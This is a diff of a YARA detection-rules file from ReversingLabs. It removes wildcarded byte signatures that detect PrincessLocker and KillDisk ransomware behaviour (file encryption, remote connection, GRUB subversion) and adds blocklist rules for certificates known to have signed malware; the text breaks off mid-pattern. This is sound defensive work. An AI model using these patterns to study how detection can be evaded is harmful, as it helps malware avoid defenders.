-		$find_files_p2 = {
-            56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ??
-            ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D
-            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ??
-            75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ??
-            ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2
-            C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" or pe.signatures [ i ] . serial == "c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" ) and 1643500800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "c6e93547-5be0-5303-b537-655db3d78ad4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11556-L11574"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "691b57929c93d14f8700e0e61170b9248499fd36b80aec90f2054c32d6a3a9eb"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_volumes_p* ) ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Genezis" and ( pe.signatures [ i ] . serial == "00:c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" or pe.signatures [ i ] . serial == "c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" ) and 1615161600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Princesslocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects PrincessLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b76ef137-aa0b-5fd3-9876-2459cb6535ff"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "a61e61c1-9fa0-5fd9-b197-bb9d1b68c8f4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.PrincessLocker.yara#L1-L92"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5be4ca3bd0b0afed1d2f3a59e2951d74a8de94c5a4d5a2c6cc29add49eab9ec0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11576-L11592"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5f151ee5781a15cca4394fdd8200162eae47e9d088a0b1551c9ed22ce11473a2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "PrincessLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45
-            ?? 50 53 FF D7 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? FF D6 85 C0 75 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 53 FF D7 68 ?? ?? ??
-            ?? 8D 4D ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ?? ?? 85 DB 75 ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 8B 30 89 B5 ?? ?? ?? ?? 3B F0 0F 84 ?? ?? ?? ?? 33 C9 C6 45 ?? ?? 6A ?? 51 8D
-            46 ?? 66 89 8D ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ??
-            66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 75 ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? C6 45 ?? ?? 8B CC
-            33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ??
-            C3 C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
-            45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
-            68 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D BD ?? ??
-            ?? ?? 6A ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 6A ?? 0F 43 BD ?? ?? ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ??
-            ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF
-            ?? 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 8D 85 ?? ??
-            ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 39 85 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            0F B6 C9 0F 46 C8 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 0F B6 C1 6A ?? 50 6A ?? FF
-            B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 FF 15
-        }
-		$remote_connection_1 = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F 85 ?? ?? ??
-            ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 45 ?? ??
-            ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$remote_connection_2 = {
-            BA ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 66 C7 45 ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 55 ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56
-            8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8B D0 C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 53 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
-            ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpiffyTech Inc." and pe.signatures [ i ] . serial == "06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" and 1634515201 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "2a15d527-7f42-5c56-9740-9c2503a66f4f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11594-L11610"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "40b78005d343684d08bb93e92c51eee10e674e8deb9eec290bc9ffe3b23061b1"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_connection_1 and $remote_connection_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orca System" and pe.signatures [ i ] . serial == "02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" and 1613735394 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects KillDisk ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "af6652dd-c668-5ae1-b51b-e272cb440c20"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "2ced71bb-622c-5597-91c3-210b9b5f3a4e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Linux.Ransomware.KillDisk.yara#L1-L144"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3ed1fb2b7b24cd4d5100d93ed53a9ab28e1482bd0998a0538d8710a962ee839f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11612-L11630"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dd7d44349baaf4a2e2f61b38cef31f288110bb03944fd4593f52a0ab03b9d172"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "KillDisk"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
-            89 45 ?? 31 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ??
-            ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 85 C0 79 ?? 48 8B
-            85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 78 ?? 48 8B 85 ?? ?? ?? ?? BE ??
-            ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ??
-            85 C0 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 90 ?? ?? ?? ?? 48 85 C0
-            48 0F 48 C2 48 C1 F8 ?? 48 89 85 ?? ?? ?? ?? 48 8B 45 ?? 48 85 C0 7E ?? 48 83 BD ??
-            ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48
-            83 BD ?? ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48 C1
-        }
-		$encrypt_files_2 = {
-            EA ?? 48 01 D0 48 D1 F8 48 C1 E0 ?? 48 89 C1 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89
-            CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ??
-            ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ??
-            ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 BA ??
-            ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48 C1 F8 ?? 48 89 C2 48 89 C8 48
-            C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B
-            85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75
-            ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ??
-            48 8B 8D ?? ?? ?? ?? 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48
-            C1 F8 ?? 48 89 C2 48 89 C8 48 C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? 83 85 ??
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ??
-            ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B 75 ?? 64 48 33
-            34 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
-        }
-		$search_files = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
-            89 45 ?? 31 C0 8B 05 ?? ?? ?? ?? 83 C0 ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 F8
-            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ??
-            ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ??
-            E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0
-            ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
-            ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
-            ?? 85 C0 75 ?? 83 85 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
-            D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 89 C2 B8 ??
-            ?? ?? ?? 48 89 D7 F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0
-            66 C7 00 ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89
-            C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8D
-            85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 E8 ?? 89 05 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
-        }
-		$subvert_grub_1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85
-            ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ??
-            ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85
